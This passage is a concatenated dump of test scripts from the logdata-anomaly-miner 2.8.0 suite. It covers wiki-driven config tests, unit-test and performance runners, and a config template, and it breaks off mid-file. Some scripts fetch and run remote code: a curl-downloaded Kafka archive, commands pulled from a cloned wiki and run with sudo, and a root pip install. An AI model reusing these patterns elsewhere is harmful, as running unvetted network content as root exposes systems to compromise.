-path "/tmp/lib/aminer/log/statistics.log" -exec md5sum {} \; | tee /tmp/test3.md5 > /dev/null suspend_diff=`diff /tmp/test1.md5 /tmp/test2.md5` activate_diff=`diff /tmp/test2.md5 /tmp/test3.md5` if [[ $suspend_diff != "" ]]; then cat /tmp/test1.md5 cat /tmp/test2.md5 echo 'The aminer should not persist data after being suspended.' exit_code=1 fi if [[ $activate_diff == "" ]]; then cat /tmp/test2.md5 cat /tmp/test3.md5 echo 'The aminer should persist data after being activated.' exit_code=1 fi sudo pkill aminer sleep 3 wait $PID sudo rm /tmp/demo-config.py sudo rm /tmp/suspend_output.txt sudo rm /tmp/syslog sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo rm /tmp/suspend.md5 sudo rm /tmp/test1.md5 sudo rm /tmp/test2.md5 sudo rm /tmp/test3.md5 test -e /var/mail/mail && sudo rm -f /var/mail/mail exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runTryItOut.sh000077500000000000000000000375071500476301700236440ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh ################################################################## # Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Write log lines from 4th to 5th ``` into /tmp/access_00 and /tmp/access_01. # 2.) Read 1st ```python to 6th ``` and compare it with ApacheAccessParsingModel. # 3.) Run the linking command between 7th and 8th ```. # 4.) Run the copy command from the 2nd line between 9th and 10th ``` and extract the CFG_PATH from that line. # 5.) Extract the line between 1st ```yaml and 11th ``` and replace LearnMode: False with it in CFG_PATH. # 6.) Replace LogResourceList path with "/tmp/access_00" in CFG_PATH. # 7.) Replace all Parser config lines in CFG_PATH with Parser config lines between 3rd ```yaml and 13th ```. # 8.) Replace all Input config lines in CFG_PATH with Input config lines between 4th ```yaml and 14th ```. # 9.) 
Replace all Analysis config lines in CFG_PATH with Analysis config lines between 5th ```yaml and 15th ```. # 10.) Replace all EventHandlers config lines in CFG_PATH with EventHandlers config lines between 6th ```yaml and 16th ```. # 11.) Parse the aminer CMD between 17th and 18th ``` and run it. Check that no error is output by the aminer. # 12.) Compare the results with the count report between 19th and 20th ``` (without actual numbers and timestamps - replace them with constant values). # 13.) Run the rm command between 21st and 22nd ``` to remove the persisted data. # 14.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 8th ```yaml and 26th ```, run CMD and check that no # error is output by the aminer by comparing the output with the lines between 27th and 28th ```. # 15.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 10th ```yaml and 34th ```, run CMD and check that no error is output by the aminer. # 16.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 11th ```yaml and 43rd ```, run CMD and check that no error is output by the aminer. # 17.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 12th ```yaml and 48th ```, run CMD and check that no error is output by the aminer. # 18.) Replace all Parser config lines in CFG_PATH with Parser config lines between 14th ```yaml and 58th ```, run CMD and check that no error is output by the aminer. # 19.) Replace all Parser config lines in CFG_PATH with Parser config lines between 17th ```yaml and 65th ```, run CMD and check that no error is output by the aminer. # 20.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 18th ```yaml and 66th ```, run CMD and check that no error is output by the aminer. # 21.) Replace all Parser config lines in CFG_PATH with Parser config lines between 20th ```yaml and 74th ```, run CMD and check that no error is output by the aminer. # 22.) 
Replace all Analysis config lines in CFG_PATH with Analysis config lines between 21th ```yaml and 75th ```, run CMD and check if no error is output by the aminer. # 23.) Replace all Parser config lines in CFG_PATH with Parser config lines between 23nd ```yaml and 81th ```, run CMD and check if no error is output by the aminer. # 24.) Replace all Analysis config lines in CFG_PATH with Analysis config lines between 24rd ```yaml and 82th ```, run CMD and check if no error is output by the aminer. # 25.) Write the config between 26th ```yaml and 92th ``` to CFG_PATH, run CMD and check if no error is output by the aminer. ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/aminer-TryItOut.md OUT=/tmp/out.txt LOG1=/tmp/access_00 LOG2=/tmp/access_01 # extract the file from the development branch of the wiki project. # the second ```python script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. # write access logs (1.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE | sed '/^```/ d' > $LOG1 cp $LOG1 $LOG2 # compare ApacheAccessParsingModel (2.) awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) IN1=$(cat ../source/root/etc/aminer/conf-available/ait-lds/ApacheAccessParsingModel.py) compareStrings "$OUT1" "$IN1" "Failed Test in 2." exit_code=$((exit_code | $?)) # link available configs (3.) awk '/^```$/ && ++n == 7, /^```$/ && n++ == 8' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD=$(cat $OUT) sudo $CMD > $OUT 2> /dev/null # copy template config and extract CFG_PATH. (4.) 
awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) $CMD IFS=' ' read -ra ADDR <<< "$CMD" CFG_PATH=$(echo "${ADDR[-1]}") # replace LearnMode: False with LearnMode: True in CFG_PATH. (5.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) sed "s/#LearnMode: false/${OUT1}/g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # replace LogResourceList file. (6.) OUT1=$(echo $LOG1) sed "s?file:///var/log/apache2/access.log?file:///${OUT1}?g" $CFG_PATH | sudo tee $CFG_PATH > /dev/null # replace parser, input, analysis and event handler config lines (7.-10.) CFG_BEFORE=$(sed '/^Parser:$/Q' $CFG_PATH) CFG_PARSER=$(awk '/^Parser:$/,/^Input:$/' < $CFG_PATH) CFG_PARSER=$(echo "$CFG_PARSER" | sed '$d') CFG_INPUT=$(awk '/^Input:$/,/^Analysis:$/' < $CFG_PATH) CFG_INPUT=$(echo "$CFG_INPUT" | sed '$d') CFG_ANALYSIS=$(awk '/^Analysis:$/,/^EventHandlers:$/' < $CFG_PATH) CFG_ANALYSIS=$(echo "$CFG_ANALYSIS" | sed '$d') CFG_EVENT_HANDLERS=$(awk '/^EventHandlers:$/,/^$/' < $CFG_PATH) CFG_EVENT_HANDLERS=$(echo "$CFG_EVENT_HANDLERS" | sed '$d') CFG_PARSER=$(awk '/^```yaml$/ && ++n == 3, /^```$/' < $INPUT_FILE | sed '/^```/ d') CFG_INPUT=$(awk '/^```yaml$/ && ++n == 4, /^```$/' < $INPUT_FILE | sed '/^```/ d') CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 5, /^```$/' < $INPUT_FILE | sed '/^```/ d') # change report_interval so the test does not need to wait 10 seconds CFG_ANALYSIS=$(echo "$CFG_ANALYSIS" | sed 's/report_interval: 10/report_interval: 3/g') CFG_EVENT_HANDLERS=$(awk '/^```yaml$/ && ++n == 6, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null # Parse the aminer CMD and run it. Check if no error is output by the aminer. (11.) 
awk '/^```$/ && ++n == 17, /^```$/ && n++ == 18' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 11." exit_code=$((exit_code | $?)) # Compare the results with the count report. (12.) echo "$(awk '/^{$/ && ++n == 2, /^}$/' < $OUT)" > $OUT # remove NewMatchPathDetector output. IN1=$(sed -n '1,7p' < $OUT) IN2=$(sed -n '8p' < $OUT) IN3=$(sed -n '9p' < $OUT) awk '/^```$/ && ++n == 19, /^```$/ && n++ == 20' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(sed -n '1,7p' < $OUT) OUT2=$(sed -n '8p' < $OUT) OUT3=$(sed -n '9p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 12." exit_code=$((exit_code | $?)) IFS=':' read -ra ADDR <<< "$IN2" IN2="${ADDR[0]}" IFS=':' read -ra ADDR <<< "$OUT2" OUT2="${ADDR[0]}" compareStrings "$OUT2" "$IN2" "Failed Test in 12." exit_code=$((exit_code | $?)) IFS=':' read -ra ADDR <<< "$IN3" IN3="${ADDR[0]}" IFS=':' read -ra ADDR <<< "$OUT3" OUT3="${ADDR[0]}" compareStrings "$OUT3" "$IN3" "Failed Test in 12." exit_code=$((exit_code | $?)) # Remove the persisted data. (13.) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT_FILE > $OUT CMD1=$(sed -n '2p' < $OUT) $CMD1 # Replace the Analysis config and compare the output. (14.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 8, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null sudo rm -r /var/lib/aminer/NewMatchPathValueDetector/accesslog_status 2> /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 14." 
exit_code=$((exit_code | $?)) echo "$(awk '/^{$/ && ++n == 2, /^}$/' < $OUT)" > $OUT # remove NewMatchPathDetector output. IN1=$(sed -n '1,23p' < $OUT) IN2=$(sed -n '25,27p' < $OUT) awk '/^```$/ && ++n == 27, /^```$/ && n++ == 28' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(sed -n '1,23p' < $OUT) OUT2=$(sed -n '25,27p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 14." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 14." exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (15.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 10, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 15." exit_code=$((exit_code | $?)) # skipping this check, because it has to change the log resources. #IN1=$(cat $OUT) #awk '/^```$/ && ++n == 39, /^```$/ && n++ == 40' < $INPUT_FILE | sed '/^```/ d' > $OUT #OUT1=$(cat $OUT) #compareStrings "$OUT1" "$IN1" "Failed Test in 15." #exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (16.) ANALYSIS_PREFIX='Analysis: ' CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 11, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$ANALYSIS_PREFIX$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? 
!= 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 16." exit_code=$((exit_code | $?)) # skipping this check, because not all log lines were used in this test, so the output can not be reproduced. #IN1=$(sed -n '113,148p' < $OUT) #awk '/^```$/ && ++n == 46, /^```$/ && n++ == 47' < $INPUT_FILE | sed '/^```/ d' > $OUT #OUT1=$(cat $OUT) #compareStrings "$OUT1" "$IN1" "Failed Test in 16." #exit_code=$((exit_code | $?)) # Replace the Analysis config and compare the output. (17.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 12, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 17." exit_code=$((exit_code | $?)) # Replace the Parser config. (18.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 14, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 18." exit_code=$((exit_code | $?)) # Replace the Parser config. (19.) 
CFG_PARSER=$(awk '/^```yaml$/ && ++n == 17, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (20.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 18, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Parser config. (21.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 20, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (22.) 
CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 21, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Parser config. (23.) CFG_PARSER=$(awk '/^```yaml$/ && ++n == 23, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Replace the Analysis config. (24.) CFG_ANALYSIS=$(awk '/^```yaml$/ && ++n == 24, /^```$/' < $INPUT_FILE | sed '/^```/ d') echo "$CFG_BEFORE" | sudo tee $CFG_PATH > /dev/null echo "$CFG_PARSER" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_INPUT" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_ANALYSIS" | sudo tee -a $CFG_PATH > /dev/null echo "$CFG_EVENT_HANDLERS" | sudo tee -a $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi # Run the final configuration. (25.) awk '/^```yaml$/ && ++n == 26, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null runAminerUntilEnd "$CMD -C" "$LOG1" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi testConfigError $OUT "Failed Test in 25." 
exit_code=$((exit_code | $?)) rm $OUT rm $LOG1 rm $LOG2 sudo rm -r logdata-anomaly-miner.wiki exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runUnittests.sh000077500000000000000000000044521500476301700240740ustar00rootroot00000000000000#!/bin/bash source config sudo cp unit/data/kafka-client.conf /etc/aminer/kafka-client.conf sudo cp unit/data/configfiles/Sub* /etc/aminer/conf-enabled/ curl $KAFKA_URL --output kafka.tgz tar xvf kafka.tgz > /dev/null rm kafka.tgz $KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh $KAFKA_VERSIONSTRING/config/zookeeper.properties > /dev/null & sleep 10 $KAFKA_VERSIONSTRING/bin/kafka-server-start.sh $KAFKA_VERSIONSTRING/config/server.properties > /dev/null & sleep 10 exit_code=0 sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/analysis -p '*Test.py' > /dev/null & ANALYSIS_PID=$! sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/events -p '*Test.py' > /dev/null & EVENTS_PID=$! sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/input -p '*Test.py' > /dev/null & INPUT_PID=$! sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/parsing -p '*Test.py' > /dev/null & PARSING_PID=$! sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/util -p '*Test.py' > /dev/null & UTIL_PID=$! sudo /usr/lib/logdata-anomaly-miner/.venv/bin/python3 -bb -m unittest discover -s unit/data -p '*Test.py' > /dev/null & DATA_PID=$! wait $ANALYSIS_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Analysis unittests." fi wait $PARSING_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Parsing unittests." fi wait $UTIL_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Util unittests." fi wait $INPUT_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Input unittests." fi wait $EVENTS_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Events unittests." 
fi wait $DATA_PID if [[ $? -ne 0 ]]; then exit_code=1 echo "Failed in Data unittests." fi test -e /var/mail/mail && sudo rm -f /var/mail/mail sudo rm /tmp/test4unixSocket.sock sudo rm /tmp/test5unixSocket.sock sudo rm /tmp/test6unixSocket.sock sudo rm -r /tmp/lib/aminer/* $KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh > /dev/null $KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh > /dev/null sudo rm -r $KAFKA_VERSIONSTRING/ sudo rm -r /tmp/zookeeper sudo rm -r /tmp/kafka-logs sudo rm /etc/aminer/kafka-client.conf sudo rm /etc/aminer/conf-enabled/Sub* exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runVulture.sh000077500000000000000000000002041500476301700235270ustar00rootroot00000000000000#!/bin/bash vulture /usr/lib/logdata-anomaly-miner --min-confidence=100 --exclude "/usr/lib/logdata-anomaly-miner/.venv/*" exit $? logdata-anomaly-miner-2.8.0/aecid-testsuite/system/000077500000000000000000000000001500476301700223255ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/000077500000000000000000000000001500476301700257665ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/aminerSystemPerformanceTest.sh000077500000000000000000000046031500476301700340320ustar00rootroot00000000000000#!/bin/bash #This script should be used to test the performance of the aminer in different hardware setups or virtual machines with different ressources. 
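# Hardware description that is recorded in the results CSV; edit per test machine.
MACHINE_NAME="Acer Aspire 5750g"
CPU_NAME="i7-2630QM"
CPU_Number="0.1"
RAM_Used="32MB"
Persistent_Memory_Type="SSD"

# Persisted aminer state is wiped before each run so that results are reproducible.
# The trailing /* is a deliberate glob, which is why this variable stays unquoted below.
AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/*
t=$(date +%d.%m.%Y_%H-%M-%S)
RESULTS_DIR=/tmp/results_$t
RESULTS_PATH=/tmp/results.csv
LOGFILE=/tmp/syslog
FILE=/tmp/performance-config.py

# Validate arguments and inputs before touching the filesystem, and exit
# non-zero so that a calling harness can detect the failure (a bare "exit"
# would return the status of the preceding echo, i.e. success).
if [[ $# -lt 2 ]]; then
  echo "Error, not enough parameters found!"
  echo "Please run the script with a parameter for the runtime in seconds and a parameter for the description."
  echo "For example: ./aminerSystemPerformanceTest.sh 900 \"Low performance test with many outputs. (./multiplyLogFile.sh 400000 syslog_low_performance_many_outputs-template /tmp/syslog)\""
  exit 1
fi
if ! test -f "$FILE"; then
  echo "$FILE does not exist!"
  exit 1
fi
if ! test -f "$LOGFILE"; then
  echo "$LOGFILE does not exist!"
  exit 1
fi
waitingTime=$1
# NOTE(review): the description is later interpolated into a printf format
# string when the results are written; a value containing '%' is interpreted
# as a conversion there, so use '%%' in descriptions that need a percent sign.
description=$2

# Prepare the persistence directory (owned by the aminer user) and a fresh results directory.
sudo mkdir /tmp/lib 2> /dev/null
sudo mkdir /tmp/lib/aminer 2> /dev/null
sudo chown -R "$USER:$USER" /tmp/lib/aminer 2> /dev/null
sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null
sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null
sudo rm -r "$RESULTS_PATH" 2> /dev/null
mkdir "$RESULTS_DIR"

echo ""
echo "calculating the MD5 sum of the logfile.."
MD5=$(md5sum "$LOGFILE" | awk '{ print $1 }')
echo "counting the lines of the logfile.."
LINE_NUMBER=$(wc -l < "$LOGFILE" | tr -d "\n")

# generateSystemLogdata.py needs psutil. NOTE(review): this installs an
# unpinned package from PyPI as root on the measurement host; pre-provisioning
# psutil (or pinning its version) keeps the test environment reproducible.
if ! python3 -c "import psutil"; then
  sudo pip3 install psutil
fi

echo "Performance test started.."
echo ""
# The data generator runs slightly longer than the test so it also captures the shutdown phase.
python3 generateSystemLogdata.py $((waitingTime+10)) 2> /tmp/error.log &
# Start aminer in the background as the aminer user. The "&" is inside the
# bash -c string, so the sudo call itself returns immediately.
sudo -H -u aminer bash -c 'aminer --config '$FILE' & #2> /dev/null & #> /tmp/output &'
# $! is the last job backgrounded by *this* shell, i.e. the data generator
# (not aminer): the later "wait $PID" waits for the generator, while aminer
# is stopped separately via pkill.
PID=$!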
sleep $waitingTime touch $RESULTS_PATH sudo chown -R aminer:aminer $RESULTS_PATH #stop aminer and python3 sleep 3 sudo pkill -x aminer.py sudo pkill -x aminer wait $PID sudo chown -R $USER:$USER $RESULTS_PATH 2> /dev/null printf " in $waitingTime seconds.\nThe source file contains $LINE_NUMBER log lines.\n\nmachine name, CPU name, #CPUs used, RAM used, persistent memory type\n$MACHINE_NAME, $CPU_NAME, $CPU_Number, $RAM_Used, $Persistent_Memory_Type\n\nConfig File,config_$t.py\nMD5-Hash Logfile,$MD5\nTest description,$description\n\n" >> $RESULTS_PATH mv $RESULTS_PATH $RESULTS_DIR cp $FILE $RESULTS_DIR/config_$t.py echo "" echo "Performance test finished!" logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/generateSystemLogdata.py000066400000000000000000000033611500476301700326360ustar00rootroot00000000000000# This file can be used to test the VariableTypeDetector. It provides discrete # and continuous data measured from the running system. import psutil import time import sys from datetime import datetime import multiprocessing with open('/tmp/results.csv', 'a+', buffering=100) as file: string = '' string += 'time,aminerCpuUsage,aminerMemUsage,' for i in range(multiprocessing.cpu_count()): string += "cpu%d," % (i+1) string += 'vmTotal,vmAvailable,vmPercent,vmUsed,vmFree\n' startTime = time.time() endTime = startTime + int(sys.argv[1]) p = None ppid = None firstRead = False while time.time() < endTime: t = time.time() for proc in psutil.process_iter(): if psutil.pid_exists(proc.pid) and proc.name() == "aminer": pid = proc.pid if p is None or pid > ppid: ppid = pid p = psutil.Process(ppid) firstRead = True if psutil.pid_exists(ppid): aminerCpu = str(p.cpu_percent(interval=0.0)) mem = "%.2f" % p.memory_percent() else: aminerCpu = '-' mem = '-' cpus = psutil.cpu_percent(percpu=True) dt = datetime.fromtimestamp(time.time()).strftime("%Y-%m-%d %H:%M:%S") vm = psutil.virtual_memory() cpu = "" for i in range(multiprocessing.cpu_count()): cpu = cpu + 
str(cpus[i]) + ',' if firstRead is True: firstRead = False else: string += "%s,%s,%s,%s%s,%s,%s,%s,%s\n" % (dt, aminerCpu, mem, cpu, vm[0], vm[1], vm[2], vm[3], vm[4]) delta = time.time()-t if delta < 1: time.sleep(1-delta) file.write(string) file.close() logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/multiplyLogFile.sh000077500000000000000000000010751500476301700314510ustar00rootroot00000000000000#!/bin/bash if [[ $# -lt 3 ]]; then echo "Error, not enough parameters found!" echo "Please run the script as follows: ./multiplyLogFile.sh numberOfCopies templateFile targetFile" echo "For example: ./multiplyLogFile.sh 2700000 syslog-template /tmp/syslog" exit fi iterations=$1 src=$2 target=$3 sudo rm $target 2> /dev/null # read the sourcefile into an array. mapfile -t srcArray < $src i=0 while [ $i -lt $iterations ]; do if [ $i -eq 0 ]; then printf "%s\n" "${srcArray[@]}" > $target else printf "%s\n" "${srcArray[@]}" >> $target fi i=$((i + 1)) done logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/performance-config.py000066400000000000000000000140371500476301700321110ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. 
# When missing, no remote control socket
# will be created.
# config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket'

# Read the analysis from this file. That part of configuration
# is separated from the main configuration so that it can be loaded
# only within the analysis child. Non-absolute path names are
# interpreted relatively to the main configuration file (this
# file). When empty, this configuration has to contain the configuration
# for the child also.
# config_properties['AnalysisConfigFile'] = 'analysis.py'

# Persistence and mail-alerting settings for this performance test, merged
# into the config_properties dictionary created above.
config_properties.update({
    # Read and store information to be used between multiple invocations
    # of aminer in this directory. The directory must only be accessible
    # to the 'AminerUser' but not group/world readable. On violation,
    # aminer will refuse to start. When undefined, '/var/lib/aminer'
    # is used. NOTE(review): this test keeps its state below /tmp; the
    # ownership/permission check described above is what protects it
    # there, so do not copy this path into a production configuration.
